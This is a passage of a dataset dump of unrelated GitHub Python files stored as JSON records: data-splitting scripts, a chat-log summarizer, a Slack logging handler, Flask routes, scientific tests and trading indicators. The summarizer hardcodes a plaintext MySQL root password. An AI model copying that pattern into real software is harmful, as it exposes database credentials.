shutil\n\n\n# This script splits all available images and labels at root_path into train, val and test sets in\n# the ratio 0.7:0.15:0.15, and then copy each image label pair to the correct folders, specified\n# by the outputs dictionary.\n# The same file structure is maintained in this process so that the SpaceNet utilities code can be\n# applied to each folder (train, val, test) without modification.\n# This is necessary even though the SpaceNet utilities code also splits the data into trainval and test\n# as it creates mask annotations from polygon labels, because that process only split the data after smaller chips are created from larger, raw images with some overlap.\n\n\nroot_path = '~/building_extraction/raw_data/'\n\nimage_dir_path = os.path.join(root_path, 'AOI_2_Vegas_Train', 'RGB-PanSharpen')\nlabel_dir_path = os.path.join(root_path, 'AOI_2_Vegas_Train', 'geojson', 'buildings')\n\nimage_names = os.listdir(image_dir_path)\nlabel_names = []\n\nfor image_name in image_names:\n if image_name.endswith('.tif'):\n parts = image_name.split('.')\n identifier = parts[0].split('RGB-PanSharpen_')[1]\n label_names.append('buildings_{}.geojson'.format(identifier))\n\n# check if all corresponding geojson files exist\nprint('Starting checking all required geojson files exist')\nfor label_name in label_names:\n if not os.path.exists(os.path.join(label_dir_path, label_name)):\n print('{} does not exist'.format(label_name))\n\nprint('There are {} image files, {} geojson files'.format(len(image_names), len(label_names)))\n\n# RGB-PanSharpen_AOI_2_Vegas_img4856.tif\n# buildings_AOI_2_Vegas_img4867.geojson\n\nimages_labels = list(zip(image_names, label_names))\nprint('First pair before shuffle: 
{}'.format(images_labels[0]))\nrandom.shuffle(images_labels) # in-place\nprint('First pair after shuffle: {}'.format(images_labels[0]))\n\ntrain_len = int(len(images_labels) * 0.7)\nval_len = int(len(images_labels) * 0.15)\n\nsplits = {}\nsplits['train'] = images_labels[:train_len]\nsplits['val'] = images_labels[train_len:train_len + val_len]\nsplits['test'] = images_labels[train_len + val_len:]\n\nprint('Resulting in {} train examples, {} val examples, {} test examples'.format(len(splits['train']), len(splits['val']), len(splits['test'])))\n\n# create dirs\ntrain_path = os.path.join(root_path, 'Vegas_processed_train')\nval_path = os.path.join(root_path, 'Vegas_processed_val')\ntest_path = os.path.join(root_path, 'Vegas_processed_test')\n\noutputs = {}\noutputs['train_label'] = os.path.join(train_path, 'geojson', 'buildings')\noutputs['train_image'] = os.path.join(train_path, 'RGB-PanSharpen')\noutputs['val_label'] = os.path.join(val_path, 'geojson', 'buildings')\noutputs['val_image'] = os.path.join(val_path, 'RGB-PanSharpen')\noutputs['test_label'] = os.path.join(test_path, 'geojson', 'buildings')\noutputs['test_image'] = os.path.join(test_path, 'RGB-PanSharpen')\n\nfor name, output_dir in outputs.items():\n\tos.makedirs(output_dir, exist_ok=True)\n\nfor split_name in ['train', 'val', 'test']:\n\tprint('Copying to {} output dir'.format(split_name))\n\tfor image_name, label_name in splits[split_name]:\n\t\t# copy to correct split file\n\t\tshutil.copy(os.path.join(image_dir_path, image_name), os.path.join(outputs['{}_image'.format(split_name)], image_name))\n\t\tshutil.copy(os.path.join(label_dir_path, label_name), os.path.join(outputs['{}_label'.format(split_name)], label_name))\n\nprint('End of split_train_val_test.py')\n","repo_name":"yangsiyu007/SpaceNetExploration","sub_path":"pipeline/split_train_val_test.py","file_name":"split_train_val_test.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"31"} +{"seq_id":"16747453868","text":"#from newspaper import Article\nfrom gensim.summarization.summarizer import summarize\nimport sys\nimport pymysql\n\n#MySql Connection\n#print(\"Connection...\")\nconn = pymysql.connect(host='localhost', user='root', passwd='16-76017662',db='capstone', charset='utf8', )\ncurs=conn.cursor(pymysql.cursors.DictCursor)\n\nsql = \"SELECT * FROM chatlog WHERE room_id = %s\"\nroomid = sys.argv[1]\n\nsummnum = sys.argv[2]#비율 또는 문장 갯수 입력\nsummtype = \"0\"\nsummtype = sys.argv[3]\n#curs.execute(sql,(roomid, memberid))\ncurs.execute(sql,roomid)\n\nrows = curs.fetchall()\n\n\n#print(summarize(news.text, ratio=0.1)) # 문장 비율\nresult =\"\\n\"\nfor row in rows:\n result += (row['contents'])+\"\\n\"\n\nprint(result)\n#summtype->0 : ratio\n\nif summtype == \"0\" :\n\tprint('ratio')\n\tprint(type(float(summnum)))\n\tprint(summarize(result, ratio=float(summnum))) # 비율\nelse:\n\tprint('line')\n\tprint(type(int(summnum)))\n\tprint(summarize(result, word_count=int(summnum))) #라인\n","repo_name":"kimsooho/Capstone_Web","sub_path":"Server/python2DB/textsummarylocalbackup.py","file_name":"textsummarylocalbackup.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26676725381","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\npackage of logging handler which send messages to Slack\n'''\nimport logging\nimport simplejson as json\nimport requests\n\n__version__ = '0.1.2'\n__url = 
'https://github.com/tetutaro/slack_logging_handler'\n__author = 'maruyama'\n\n\nclass SlackLoggingHandler(logging.Handler):\n\tdefault_emojis = {\n\t\tlogging.NOTSET: ':question:',\n\t\tlogging.DEBUG: ':thought_balloon:',\n\t\tlogging.INFO: ':speech_balloon:',\n\t\tlogging.WARNING: ':right_anger_bubble:',\n\t\tlogging.ERROR: ':mega:',\n\t\tlogging.CRITICAL: ':loudspeaker:',\n\t}\n\n\tdef __init__(\n\t\tself, url=None, channel=None, username=None, emojis=None,\n\t\tformat='%(asctime)s: %(name)s-%(module)s: %(message)s'\n\t):\n\t\tlogging.Handler.__init__(self)\n\t\tif url is None:\n\t\t\traise ValueError('url must be set')\n\t\tself.webhook_url = url\n\t\tself.channel = channel\n\t\tself.username = username\n\t\tself.formatter = logging.Formatter(format)\n\t\tif emojis is not None:\n\t\t\tself.emojis = emojis\n\t\telse:\n\t\t\tself.emojis = SlackLoggingHandler.default_emojis\n\t\treturn\n\n\tdef _make_content(self, record):\n\t\tmsg = self.format(record)\n\t\tcontent = dict()\n\t\tif record.levelno > logging.INFO:\n\t\t\tcontent['link_names'] = 1\n\t\t\tcontent['attachments'] = [{\n\t\t\t\t'fallback': msg,\n\t\t\t\t'color': 'danger',\n\t\t\t\t'text': '@channel ' + msg,\n\t\t\t}]\n\t\telse:\n\t\t\tcontent['attachments'] = [{\n\t\t\t\t'fallback': msg,\n\t\t\t\t'color': 'good',\n\t\t\t\t'text': msg,\n\t\t\t}]\n\t\tcontent['icon_emoji'] = self.emojis[record.levelno]\n\t\tif self.username:\n\t\t\tcontent['username'] = self.username + ' ' + record.levelname\n\t\telse:\n\t\t\tcontent['username'] = record.levelname\n\t\tif self.channel:\n\t\t\tcontent['channel'] = self.channel\n\t\treturn content\n\n\tdef emit(self, record):\n\t\theaders = {'Content-type': 'application/json'}\n\t\tcontent = self._make_content(record)\n\t\ttry:\n\t\t\trequests.post(self.webhook_url, data=json.dumps(content), headers=headers)\n\t\texcept:\n\t\t\tself.handleError(record)\n\t\treturn\n","repo_name":"tetutaro/slack_logging_handler","sub_path":"slack_logging_handler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32369822547","text":"N = int( input() )\ninu = []\ninu_RG = []\ninu_GB = []\ninu_BR = []\nfor _ in range( 2 * N ):\n a, c = input().split()\n a = int( a )\n inu.append( tuple( ( a, c ) ) )\n if c == \"R\":\n inu_BR.append( tuple( ( a, c ) ) )\n inu_RG.append( tuple( ( a, c ) ) )\n elif c == \"G\":\n inu_RG.append( tuple( ( a, c ) ) )\n inu_GB.append( tuple( ( a, c ) ) )\n else:\n inu_GB.append( tuple( ( a, c ) ) )\n inu_BR.append( tuple( ( a, c ) ) )\n\ninu.sort()\ninu_RG.sort()\ninu_GB.sort()\ninu_BR.sort()\nRG = []\nGB = []\nBR = []\n\nfor i in range( len( inu_RG ) - 1 ):\n a, c = inu_RG[ i ]\n b, d = inu_RG[ i + 1 ]\n if c != d:\n RG.append( b - a )\n\nfor i in range( len( inu_GB ) - 1 ):\n a, c = inu_GB[ i ]\n b, d = inu_GB[ i + 1 ]\n if c != d:\n GB.append( b - a )\n\nfor i in range( len( inu_BR ) - 1 ):\n a, c = inu_BR[ i ]\n b, d = inu_BR[ i + 1 ]\n if c != d:\n BR.append( b - a )\n\nfrom collections import Counter\ncount = Counter()\n\nfor ( _, c ) in inu:\n count[ c ] += 1\n\nif count[ \"R\" ] % 2 == 0 and count[ \"B\" ] % 2 == 0:\n print( \"0\" )\nelse:\n if count[ \"R\" ] % 2 == 0:\n if count[ \"R\" ] == 0:\n print( min( GB ) )\n else:\n print( min( min( GB ), min( RG ) + min( BR ) ) )\n elif count[ \"G\" ] % 2 == 0:\n if count[ \"G\" ] == 0:\n print( min( BR ) )\n else:\n print( min( min( BR ), min( GB ) + min( RG ) ) )\n else:\n if count[ \"B\" ] == 0:\n 
print( min( RG ) )\n else:\n print( min( min( RG ), min( BR ) + min( GB ) ) )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ARC/ARC121/arc121-b.py","file_name":"arc121-b.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3896390267","text":"\"\"\"\nThis file contains examples of Identify API usage.\n\"\"\"\n\nfrom indykite_sdk.identity import IdentityClient\n\n\ndef introspect_token_example():\n token = \"JWT TOKEN\"\n client = IdentityClient()\n token_info = client.introspect_token(token)\n if token_info is not None:\n print(\"Token info\")\n print(\"Tenant: \" + token_info.subject.tenantId)\n print(\"Customer: \" + token_info.customerId)\n print(\"App space: \" + token_info.appSpaceId)\n print(\"Application: \" + token_info.applicationId)\n print(\"Subject: \" + token_info.subject.id)\n print(\"Expire time: \" + str(token_info.expireTime))\n\n\ndef verify_digital_twin_email_example():\n token = \"VERIFICATION TOKEN FROM TEMPORAL\"\n client = IdentityClient()\n digital_twin_info = client.verify_digital_twin_email(token)\n if digital_twin_info is not None:\n print(\"Digital twin info\")\n print(\"Tenant: \" + digital_twin_info.tenantId)\n print(\"Digital twin: \" + digital_twin_info.id)\n\n\ndef digital_twin_by_token():\n token = \"JWT TOKEN\"\n client = IdentityClient()\n digital_twin = client.get_digital_twin_by_token(token, [\"email\"])\n if digital_twin is not None:\n if \"digitalTwin\" in digital_twin:\n print(digital_twin[\"digitalTwin\"])\n if \"tokenInfo\" in digital_twin:\n print(\"\\nToken info:\")\n print(digital_twin[\"tokenInfo\"])\n\n\ndef digital_twin():\n dt_id = \"DIGITAL TWIN ID\"\n tenant_id = \"TENANT ID\"\n client = IdentityClient()\n digital_twin = client.get_digital_twin(dt_id, tenant_id, [\"email\", \"address\"])\n print(\"Digital Twin info\")\n if digital_twin is not None:\n if \"digitalTwin\" in digital_twin:\n print(digital_twin[\"digitalTwin\"])\n if \"tokenInfo\" in digital_twin:\n print(\"\\nToken info:\")\n print(digital_twin[\"tokenInfo\"])\n\n\ndef enrich_token():\n token = \"JWT TOKEN\"\n claims = {\n \"string_claim\": \"string_value\",\n \"number_claim\": 42,\n \"bool_claim\": True,\n \"null_claim\": None,\n \"map_claim\": {\n \"key\": \"value\",\n },\n \"array_claim\": [\n \"string_value\",\n ]\n }\n client = IdentityClient()\n response = client.enrich_token(token, claims, claims)\n if response is not None:\n print(\"Successfully enriched token\")\n else:\n print(\"Invalid token\")\n","repo_name":"indykite/indykite-sdk-python","sub_path":"indykite_sdk/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37252110591","text":"from flask import (render_template, url_for, flash,\n redirect, request, abort, Blueprint)\nfrom flask_login import current_user, login_required\nfrom clubmanager import db\nfrom clubmanager.models import Club, User, Membership\nfrom clubmanager.clubs.forms import ClubForm\n\n\nclubs = Blueprint('clubs', __name__)\n\ndef user_is_member(club_id, players):\n active_status = False\n for p in players:\n if p.member == current_user:\n if p.is_member == True:\n active_status = True\n return active_status\n\ndef user_is_admin(club_id, players):\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n return admin_status\n\ndef 
user_is_pending(club_id, club):\n player_list = []\n pending_status = False\n for m in club.members:\n p = User(id=m.user_id)\n player_list.append(p)\n if current_user in player_list:\n pending_status = True\n else:\n pending_status = False\n return pending_status\n\n\n@clubs.route(\"/\")\n@login_required\ndef home():\n page = request.args.get('page',1, type=int)\n clubs = Club.query.all()\n return render_template('home.html', clubs=clubs)\n\n@clubs.route(\"/club/new\", methods=['GET', 'POST'])\n@login_required\ndef new_club():\n form = ClubForm()\n if form.validate_on_submit():\n club = Club(name=form.name.data)\n db.session.add(club)\n db.session.commit()\n flash('Your club has been created!', 'success')\n return redirect(url_for('clubs.home'))\n return render_template('create_club.html', title='New Club',\n form=form, legend='New Club')\n\n@clubs.route(\"/club/\")\n@login_required\ndef club(club_id):\n club = Club.query.get_or_404(club_id)\n players = club.members\n teams = club.teams\n '''I want to see if the user is an admin'''\n admin_status = user_is_admin(club_id, players)\n '''I want to see if the user is in the list of members'''\n pending_status = user_is_pending(club_id, club)\n '''I want to see if the user has an approved membership'''\n active_status = user_is_member(club_id, players)\n return render_template('club.html', club=club, players=players, teams=teams, active_status=active_status,\n pending_status=pending_status, admin_status=admin_status)\n\n@clubs.route(\"/club//join\", methods=['GET', 'POST'])\n@login_required\ndef join_club(club_id):\n club = Club.query.get_or_404(club_id)\n user = current_user\n membership = Membership(user_id=user.id, club_id=club.id)\n db.session.add(membership)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//leave\", methods=['GET', 'POST'])\n@login_required\ndef leave_club(club_id):\n club = Club.query.get_or_404(club_id)\n user = User.query.get(current_user.id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n db.session.delete(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//approve_member\", methods=['GET', 'POST'])\n@login_required\ndef approve_member(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n if admin_status == True:\n final.is_member = True\n db.session.add(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//make_admin\", methods=['GET', 'POST'])\n@login_required\ndef make_admin(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == 
True:\n admin_status = True\n if admin_status == True:\n final.is_admin = True\n db.session.add(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n@clubs.route(\"/club//user//remove_member\", methods=['GET', 'POST'])\n@login_required\ndef remove_member(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n players = club.members\n user = User.query.get(user_id)\n membership = Membership.query.filter_by(user_id=user.id).filter_by(club_id=club.id)\n final = membership[0]\n '''I need to do a check to make sure the current user is an admin of the club'''\n admin_status = False\n for p in players:\n if p.member == current_user:\n if p.is_admin == True:\n admin_status = True\n if admin_status == True:\n db.session.delete(final)\n db.session.commit()\n return redirect(url_for('clubs.club', club_id=club.id))\n\n\n@clubs.route(\"/club//user/\")\n@login_required\ndef member_profile(club_id, user_id):\n '''Load the club, user and corresponding membership object'''\n club = Club.query.get_or_404(club_id)\n user = User.query.get_or_404(user_id)\n club_teams = club.teams\n club_list = []\n for c in user.clubs:\n i = Club(id=c.club_id)\n club_list.append(i)\n return render_template('member_profile.html', club=club, user=user,\n club_list=club_list, club_teams=club_teams)\n","repo_name":"egibney/club-manager","sub_path":"clubmanager/clubs/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3088247104","text":"#!/usr/local/bin python\n# -*- coding:utf-8 -*-\n\nimport math\nfrom XCSConfig import *\n\nclass XCSClassifier:\n def __init__(self,condition,actual_time):\n self.condition = condition[:]\n self.time_stamp = actual_time\n self.numerosity = 1\n self.action_set_size = 1\n self.action = 1\n \"\"\"initialization parameters{p,e,f}\n should be taken very small\"\"\"\n self.prediction = 0.01\n self.error = 0.01\n self.fitness = 0.01\n def deep_copy(self,actual_time):\n cl = XCSClassifier(self.condition,actual_time)\n cl.action = self.action\n cl.prediction = self.prediction\n cl.error = self.error\n cl.fitness = self.fitness/self.numerosity\n cl.numerosity = self.numerosity\n cl.experience = self.experience\n cl.time_stamp = actual_time\n cl.action_set_size = self.action_set_size\n return cl\n def update_fitness(self,acc_sum):\n self.fitness += conf.beta*(self.get_kappa()*self.numerosity/acc_sum-self.fitness)\n def update_parameters(self,reward,num_sum):\n self.experience += 1\n if self.experience < (1/conf.beta):\n self.prediction += (reward-self.prediction)/self.experience\n else:\n self.prediction += conf.beta*(reward-self.prediction)\n if self.experience < (1/conf.beta):\n self.error += (math.fabs(reward-self.prediction)-self.error)/self.experience\n else:\n self.error += conf.beta*(math.fabs(reward-self.prediction)-self.error)\n if self.experience < (1/conf.beta):\n self.action_set_size += (num_sum-self.action_set_size)/self.experience\n else:\n self.action_set_size += conf.beta*(num_sum-self.action_set_size)\n def deletion_vote(self,ave_fitness):\n vote = self.action_set_size*self.numerosity\n if self.experience > conf.theta_del:\n if self.fitness/self.numerosity < conf.delta*ave_fitness:\n vote *= ave_fitness/(self.fitness/self.numerosity)\n return vote\n def equals(self,cl):\n if self.condition == cl.condition:\n if self.action == cl.action:\n return True\n 
return False\n def does_subsume(self,cl_tos):\n if self.action == cl_tos.action:\n if self.could_subsume() and self.is_more_general(cl_tos):\n return True\n return False\n def could_subsume(self):\n if self.experience > conf.theta_sub and self.error < conf.epsilon_0:\n return True\n return False\n def is_more_general(self,cl_spec):\n ret = False\n for i in range(len(self.condition)):\n if self.condition[i] != '#' and self.condition[i] != cl_spec.condition[i]:\n return False\n elif self.condition[i] != cl_spec.condition[i]:\n ret = True\n return ret\n def get_kappa(self):\n kappa = 0.0\n if self.error < conf.epsilon_0:\n kappa = 1.0\n else:\n kappa = conf.alpha*math.pow(self.error/conf.epsilon_0,-conf.nyu)\n return kappa\n\n# for debug\n# if __name__ == '__main__':\n# a = [XCSClassifier([0,0,1],0),XCSClassifier([0,1,0],1)]\n# for cl in a:\n# cl.action += 1\n# print cl.action\n","repo_name":"minatosato/XCS","sub_path":"XCSClassifier.py","file_name":"XCSClassifier.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37277829686","text":"import pytest\n\nfrom vayesta import rpa\nfrom vayesta.tests.common import TestCase\nfrom vayesta.tests import testsystems\n\n\nclass DiamondRIRPATest(TestCase):\n PLACES = 8\n\n @classmethod\n def setUpClass(cls):\n cls.sys = testsystems.diamond_sto3g_s211\n cls.known_results = dict(e_tot=-149.51936410641733, e_corr=-0.19193623440986585)\n\n def _test_energy(self, myrpa):\n \"\"\"Test the RPA energy.\"\"\"\n self.assertAlmostEqual(myrpa.e_corr, self.known_results[\"e_corr\"], self.PLACES)\n self.assertAlmostEqual(myrpa.e_tot, self.known_results[\"e_tot\"], self.PLACES)\n\n @pytest.mark.slow\n def test_energy_rhf_opt(self):\n \"\"\"Tests for diamond with optimised RHF dRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIdRRPA(self.sys.rhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.fast\n def test_energy_rhf_generic(self):\n \"\"\"Tests for diamond with generic RHF RIRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIRRPA(self.sys.rhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.slow\n def test_energy_uhf(self):\n \"\"\"Tests for diamond with generic UHF RIRPA code.\"\"\"\n\n rirpa = rpa.rirpa.ssRIURPA(self.sys.uhf())\n rirpa.kernel_energy()\n self._test_energy(rirpa)\n\n @pytest.mark.fast\n def test_rhf_moments(self):\n gen_rirpa = rpa.rirpa.ssRIRRPA(self.sys.rhf())\n opt_rirpa = rpa.rirpa.ssRIdRRPA(self.sys.rhf())\n mom0_gen = gen_rirpa.kernel_moms(0)[0]\n mom0_opt = opt_rirpa.kernel_moms(0)[0]\n self.assertAllclose(mom0_gen, mom0_opt, self.PLACES)\n\n\n@pytest.mark.slow\nclass GrapheneRIRPATest(DiamondRIRPATest):\n @classmethod\n def setUpClass(cls):\n cls.sys = testsystems.graphene_sto3g_s211\n cls.known_results = dict(e_tot=-150.15057360171875, e_corr=-0.17724246753903117)\n","repo_name":"BoothGroup/Vayesta","sub_path":"vayesta/tests/rpa/test_rirpa_solids.py","file_name":"test_rirpa_solids.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"31"} +{"seq_id":"4362618383","text":"# -*- coding: utf-8 -*-\nfrom pandas import DataFrame, concat\nfrom pandas_ta import Imports\nfrom pandas_ta.overlap import rma\nfrom pandas_ta.utils import get_drift, get_offset, verify_series, signals\n\n\ndef rsi(close, length=None, scalar=None, talib=None, drift=None, offset=None, **kwargs):\n \"\"\"Indicator: Relative Strength Index (RSI)\"\"\"\n # Validate 
arguments\n length = int(length) if length and length > 0 else 14\n scalar = float(scalar) if scalar else 100\n close = verify_series(close, length)\n drift = get_drift(drift)\n offset = get_offset(offset)\n mode_tal = bool(talib) if isinstance(talib, bool) else True\n\n if close is None: return\n\n # Calculate Result\n if Imports[\"talib\"] and mode_tal:\n from talib import RSI\n rsi = RSI(close, length)\n else:\n negative = close.diff(drift)\n positive = negative.copy()\n\n positive[positive < 0] = 0 # Make negatives 0 for the postive series\n negative[negative > 0] = 0 # Make postives 0 for the negative series\n\n positive_avg = rma(positive, length=length)\n negative_avg = rma(negative, length=length)\n\n rsi = scalar * positive_avg / (positive_avg + negative_avg.abs())\n\n # Offset\n if offset != 0:\n rsi = rsi.shift(offset)\n\n # Handle fills\n if \"fillna\" in kwargs:\n rsi.fillna(kwargs[\"fillna\"], inplace=True)\n if \"fill_method\" in kwargs:\n rsi.fillna(method=kwargs[\"fill_method\"], inplace=True)\n\n # Name and Categorize it\n rsi.name = f\"RSI_{length}\"\n rsi.category = \"momentum\"\n\n signal_indicators = kwargs.pop(\"signal_indicators\", False)\n if signal_indicators:\n signalsdf = concat(\n [\n DataFrame({rsi.name: rsi}),\n signals(\n indicator=rsi,\n xa=kwargs.pop(\"xa\", 80),\n xb=kwargs.pop(\"xb\", 20),\n xserie=kwargs.pop(\"xserie\", None),\n xserie_a=kwargs.pop(\"xserie_a\", None),\n xserie_b=kwargs.pop(\"xserie_b\", None),\n cross_values=kwargs.pop(\"cross_values\", False),\n cross_series=kwargs.pop(\"cross_series\", True),\n offset=offset,\n ),\n ],\n axis=1,\n )\n\n return signalsdf\n else:\n return rsi\n\n\nrsi.__doc__ = \\\n\"\"\"Relative Strength Index (RSI)\n\nThe Relative Strength Index is popular momentum oscillator used to measure the\nvelocity as well as the magnitude of directional price movements.\n\nSources:\n https://www.tradingview.com/wiki/Relative_Strength_Index_(RSI)\n\nCalculation:\n Default Inputs:\n length=14, scalar=100, drift=1\n ABS = Absolute Value\n RMA = Rolling Moving Average\n\n diff = close.diff(drift)\n positive = diff if diff > 0 else 0\n negative = diff if diff < 0 else 0\n\n pos_avg = RMA(positive, length)\n neg_avg = ABS(RMA(negative, length))\n\n RSI = scalar * pos_avg / (pos_avg + neg_avg)\n\nArgs:\n close (pd.Series): Series of 'close's\n length (int): It's period. Default: 14\n scalar (float): How much to magnify. Default: 100\n talib (bool): If TA Lib is installed and talib is True, Returns the TA Lib\n version. Default: True\n drift (int): The difference period. Default: 1\n offset (int): How many periods to offset the result. 
Default: 0\n\nKwargs:\n fillna (value, optional): pd.DataFrame.fillna(value)\n fill_method (value, optional): Type of fill method\n\nReturns:\n pd.Series: New feature generated.\n\"\"\"\n","repo_name":"twopirllc/pandas-ta","sub_path":"pandas_ta/momentum/rsi.py","file_name":"rsi.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":4180,"dataset":"github-code","pt":"31"} +{"seq_id":"35741514108","text":"import pygame\nfrom Parts import Game\nfrom Parts import Paddle\nfrom Parts import Ball\n\n\npygame.init()\npygame.font.init()\n\nWIDTH, HEIGHT = 1000, 700\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\n\nSQ_SIZE = 10\nboard_shape = [int(WIDTH/SQ_SIZE), int((HEIGHT-200)/SQ_SIZE)]\n\nball_w = 8\nball_h = 8\nball_speed = -9\nball = Ball(WIN, round(WIDTH/2 - ball_w/2), 650, ball_w, ball_h, ball_speed)\n\npaddle_w = 100\npaddle_h = 20\npaddle_speed = 15\npaddle = Paddle(WIN, WIDTH/2 - paddle_w/2, HEIGHT - paddle_h - 10, paddle_w, paddle_h, paddle_speed)\nFPS = 30\n\n\ngame = Game(WIN, FPS, board_shape, SQ_SIZE, ball, paddle)\ngame.run()\n","repo_name":"Emc2356/ball-with-cubes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13161734892","text":"import os\nimport math\nfrom ctypes import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport libtiepie\n\nPRODUCT_IDS = {\n \"Combi\": libtiepie.PID_COMBI,\n \"HP3\": libtiepie.PID_HP3,\n \"HS4\": libtiepie.PID_HS4,\n \"HS4D\": libtiepie.PID_HS4D,\n \"HS5\": libtiepie.PID_HS5,\n}\n\nlibc = cdll.LoadLibrary(\"libc.so.6\")\n\n\ndef eventfd(init_val=0, flags=0):\n return libc.eventfd(init_val, flags)\n\n\ndef eventfd_clear(fd):\n os.read(fd, 8)\n\n\ndef try_open_device(argv, device_type):\n dev = None\n\n if len(argv) > 1:\n serial = 0\n try:\n serial = int(argv[1])\n except:\n pid = str_to_pid(argv[1])\n\n if serial > 0:\n dev = libtiepie.device_list.get_item_by_serial_number(serial).open_device(device_type)\n else:\n dev = libtiepie.device_list.get_item_by_product_id(pid).open_device(device_type)\n else:\n for item in libtiepie.device_list:\n try:\n dev = item.open_device(device_type)\n break\n except:\n pass\n\n if dev:\n return dev\n else:\n raise Exception(\"No devices found\")\n\n\ndef create_ui(item, parent=None):\n\n scp = item.open_oscilloscope() if (item.types & libtiepie.DEVICETYPE_OSCILLOSCOPE) != 0 else None\n if scp:\n from oscilloscopeui import OscilloscopeUI\n scpui = OscilloscopeUI(scp, parent)\n scpui.show()\n\n gen = item.open_generator() if (item.types & libtiepie.DEVICETYPE_GENERATOR) != 0 else None\n if gen:\n from generatorui import GeneratorUI\n genui = GeneratorUI(gen, parent)\n genui.show()\n\n\ndef val_to_str(value, digits=6, decimals=3):\n value_abs = float(abs(value))\n prefix = ''\n\n if value_abs >= 1e9:\n value /= 1e9\n prefix = 'G'\n elif value_abs >= 1e6:\n value /= 1e6\n prefix = 'M'\n elif value_abs >= 1e3:\n value /= 1e3\n prefix = 'k'\n elif value_abs < 1e-9:\n pass # almost zero, no prefix\n elif value_abs < 1e-6:\n value *= 1e9\n prefix = 'n'\n elif value_abs < 1e-3:\n value *= 1e6\n prefix = 'u'\n elif value_abs < 1e0:\n value *= 1e3\n prefix = 'm'\n\n s = \"{:\" + str(digits - decimals) + \".\" + str(decimals) + \"f} {:s}\"\n return s.format(value, prefix)\n\n\ndef ceil_125(value):\n factor = 10 ** math.floor(math.log10(value))\n value /= factor\n\n if value <= 1:\n value = 1\n elif value <= 2:\n value = 
2\n elif value <= 5:\n value = 5\n else:\n value = 10\n\n return value * factor\n\n\ndef sequence_125(min, max):\n values = []\n value = ceil_125(min)\n\n while value <= max:\n values.append(value)\n value = ceil_125(value * 2)\n\n return values\n\n\ndef str_to_pid(value):\n if value in PRODUCT_IDS:\n return PRODUCT_IDS[value]\n else:\n raise Exception(\"Invalid product ID: \" + value)\n\n\ndef unwrap_QVariant(value):\n if(value.type() == QMetaType.Int):\n return value.toInt()[0]\n elif(value.type() == QMetaType.Double):\n return value.toDouble()[0]\n elif(value.type() == QMetaType.QVariantMap):\n return dict((str(k), v) for k, v in value.toPyObject().iteritems())\n elif(value.typeName() == \"PyQt_PyObject\"):\n return value.toPyObject()\n elif(value.isNull()):\n return None\n else:\n raise Exception(\"Can't unwrap QVariant: \" + value.typeName())\n","repo_name":"reinder/libtiepie-ui","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12016698645","text":"import os\nimport urllib.parse as up\n\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom flask import url_for, make_response, jsonify\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\n\nfrom src import api, db, ma, create_app, configs, bp, security, admin, celery, serializer_helper, sentry,\\\n redis_store, sms, url_shortener, limiter, jwt, razor\n\n\nconfig = os.environ.get('PYTH_SRVR', 'default')\n\nconfig = configs.get(config)\n\nextensions = [api, db, ma, security, admin, 